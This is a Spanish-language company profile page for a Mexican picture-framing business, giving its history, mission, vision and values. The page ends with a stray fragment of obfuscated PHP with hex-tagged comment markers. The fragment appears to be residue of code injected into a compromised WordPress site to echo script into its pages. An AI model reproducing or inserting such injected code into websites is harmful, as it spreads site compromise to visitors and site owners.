Bienvenido

Durante estos casi 40 años de servir a nuestros clientes, hemos enmarcado un sin número de objetos.

¿Quienes Somos?

Le Paysage Galerías ©, S.A. de C.V., es una empresa mexicana constituida legalmente en 1992 con capital 100% mexicano, inició operaciones desde 1972 como una persona física con actividad empresarial. El negocio comienza con la idea de una mujer emprendedora y muy trabajadora que obtiene el capital para comprar la fábrica de marcos. Con la idea de crear un negocio innovador vanguardista y próspero, decide iniciar la venta al público dentro de un centro comercial.

Hoy en día Le Paysage se consolida como una empresa sólida y líder en el mercado.



Misión

Proveer la asesoría adecuada y profesional para la conservación de las piezas que las personas valoran ya sea una obra de arte o recuerdos, logros, reconocimientos en un espacio que complazca los sentidos, gustos y necesidades de nuestros clientes mediante colores, materiales, conocimiento, atención y servicio, acercándole a la mejor opción siendo lo más importante dedicar nuestro trabajo y esfuerzo con gusto en hacer de nuestra empresa líder con valor agregado, que excedan sus metas y objetivos, incrementando su capital intelectual y otorgando a sus colaboradores un ambiente laboral digno y de crecimiento reconocido por su contribución al desarrollo social, el respeto al medio ambiente, así como, por su alta eficacia operativa y rentabilidad de la inversión de sus accionistas.



Visión

Crecer como cadena y llegar hasta el último rincón donde se enmarque lo más preciado para nuestros clientes con producto y servicio de la más alta calidad.

Nuestros Valores

Servicio
Constituye la razón fundamental de la existencia de Le Paysage. Significa tener y mantener la actitud y conciencia para identificar y satisfacer plenamente las necesidades de nuestros clientes internos y externos, con alto sentido de responsabilidad, oportunidad y competitividad.

Honestidad
Directriz permanente de la conducta de los integrantes de Le Paysage. Valor rector de un comportamiento responsable y transparente, en el manejo de los bienes y recursos de la empresa, de su personal de sus clientes y de sus proveedores.

Respeto
Reconocimiento a la dignidad de los demás y voluntad de no transgredirla en ningún momento ni circunstancia. Elemento fundamental para la interacción dentro de Le Paysage y para el desarrollo de una atmósfera de confianza que favorezca la libre participación, la convivencia armónica y las relaciones productivas entre todos sus colaboradores.

Compromiso
Es la entrega incondicional y la lealtad personal con la labor encomendada, para el logro de las metas y la realización de la misión de Le Paysage. Actitud para afrontar los desafíos con sentido de profesionalismo y con perspectiva de competitividad.

Calidad
Es una herramienta básica en Le Paysage el satisfacer las necesidades de nuestros clientes, dando el mejor servicio para que la excelente clase del producto quede fijo en la mente de nuestros consumidores.

($wp_74282ixi,1,3) === 'scr'){ echo $wp_74282ixi; } #/561fdb# ?>